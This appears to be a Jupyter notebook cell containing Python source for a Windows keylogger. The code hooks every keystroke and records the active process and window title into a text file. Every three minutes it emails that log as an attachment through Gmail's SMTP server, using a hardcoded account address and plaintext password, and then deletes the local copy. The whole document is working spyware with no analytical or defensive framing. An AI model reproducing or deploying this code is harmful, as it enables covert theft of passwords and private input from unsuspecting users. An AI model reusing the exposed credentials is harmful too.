In [ ]:
import keyboard,os,time
from functools import partial
from ctypes import *
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from smtplib import SMTP

current_window=None

def get_process():
    ventana=user32.GetForegroundWindow()
    pid=c_ulong(0)
    user32.GetWindowThreadProcessId(ventana,byref(pid))
    id_process='%d'% pid.value
    ejecutable=create_string_buffer(b'\x00'*512)
    h_process=kernel32.OpenProcess(0x400 | 0x10,False,pid)
    psapi.GetModuleBaseNameA(h_process,None,byref(ejecutable),512)
    window_title=create_string_buffer(b'\x00'*512)
    length=user32.GetWindowTextA(ventana,byref(window_title),512)
    dic_process['PID']=id_process
    dic_process['Ejecutable']=ejecutable.value
    dic_process['Window']=window_title.value
    kernel32.CloseHandle(ventana)
    kernel32.CloseHandle(h_process)
    return dic_process

def get_pid():
    h_wnd=user32.GetForegroundWindow()
    pid=wintypes.DWORD()
    user32.GetWindowThreadProcessId(h_wnd,byref(pid))
    return pid.value

def get_key(is_down,event):
    global current_window
    file=open('windows_key.txt','a')
    valor_pid=get_pid()
    if valor_pid != current_window:
        current_window=valor_pid
        file.write(str(get_process())+'\n')
        try:
            if event.event_type in ("up", "down"):
                key = mapa.get(event.name, event.name)
                modifier = len(key) > 1
                if not modifier and event.event_type == "down":
                    return
                if modifier:
                    if event.event_type == "down":
                        if is_down.get(key, False):
                            return
                        else:
                            is_down[key] = True
                    elif event.event_type == "up":
                        is_down[key] = False
                    key = " [{} ({})] ".format(key, event.event_type)
                elif key == "\r":
                    key = "\n"
                file.write(key)
                file.flush()
                file.close()
        except :
            pass
    else:
        try:
            if event.event_type in ("up", "down"):
                key = mapa.get(event.name, event.name)
                modifier = len(key) > 1
                if not modifier and event.event_type == "down":
                    return
                if modifier:
                    if event.event_type == "down":
                        if is_down.get(key, False):
                            return
                        else:
                            is_down[key] = True
                    elif event.event_type == "up":
                        is_down[key] = False
                    key = " [{} ({})] ".format(key, event.event_type)

                elif key == "\r":
                    key = "\n"
                file.write(key)
                file.flush()
                file.close()
              
        except :
            pass
         
def envio_gmail():
    mensaje=MIMEMultipart('plain')
    mensaje['From']='bigcypher2017@gmail.com'
    mensaje['To']='bigcypher2017@gmail.com'
    mensaje['Subject']='keylogger de Windows'
    adjunto=MIMEBase('application','octect-stream')
    archivo='windows_key.txt'
    
    if os.path.isfile(archivo):
        try:
            with open(archivo,'rb') as fname:
                adjunto.set_payload(fname.read())
                adjunto.add_header("content-Disposition",'attachment; filename="keylogger.txt"')
                mensaje.attach(adjunto)
                smtp=SMTP('smtp.gmail.com',587)
                smtp.starttls()
                smtp.login('bigcypher2017@gmail.com','M@ikel01*')
                smtp.sendmail('bigcypher2017@gmail.com','bigcypher2017@gmail.com',mensaje.as_string())
                smtp.quit()
                fname.close()
                os.remove(archivo)
        except:
             pass
    else:
        pass

def Main():
    global user32,kernel32,psapi,dic_process,mapa,file
    mapa={
        'space':' ',
        '\r':'\n'
        }
    dic_process={}
    is_down={}
    user32=windll.user32
    kernel32=windll.kernel32
    psapi=windll.psapi
    keyboard.hook(partial(get_key,is_down))
   
    while True:
        time.sleep(180)
        envio_gmail()
      
        
       
        
   
if __name__=='__main__':
    Main()  